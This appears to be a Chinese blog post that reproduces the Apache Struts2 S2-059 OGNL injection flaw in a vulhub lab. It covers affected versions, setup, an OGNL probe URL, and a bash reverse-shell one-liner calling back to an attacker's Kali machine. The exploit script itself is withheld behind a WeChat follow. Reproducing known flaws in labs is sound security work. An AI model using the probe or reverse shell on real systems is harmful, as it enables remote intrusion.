Struts2-059 漏洞复现

0x00 漏洞简介

Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。

0x01 影响版本

Struts 2.0.0 - Struts 2.5.20

0x02 环境搭建

用vulhub搭建即可

docker-compos up -d

环境完成

Struts2-059 漏洞复现

 

 

0x03 漏洞复现

http://your-ip:8080/?id=1

正常访问

http://your-ip:8080/?id=%25{3*3}

然后F12 可以看到html里三乘以三被执行,也就是3*3被解析到id属性中了。

 Struts2-059 漏洞复现

 

 接下来反弹shell:

bash -i >& /dev/tcp/kali的ip/端口 0>&1

需要编码

 Struts2-059 漏洞复现

将编码完的bash替换到脚本里边,ip替换,需要脚本的右边公众号留言,让我骗两粉丝(哈哈hhhh)

 Struts2-059 漏洞复现

0x04 修复意见

更新Struts2位最新版本

上一篇:简单实现Struts2的权限拦截器


下一篇:Struts2 S2-061 远程命令执行漏洞复现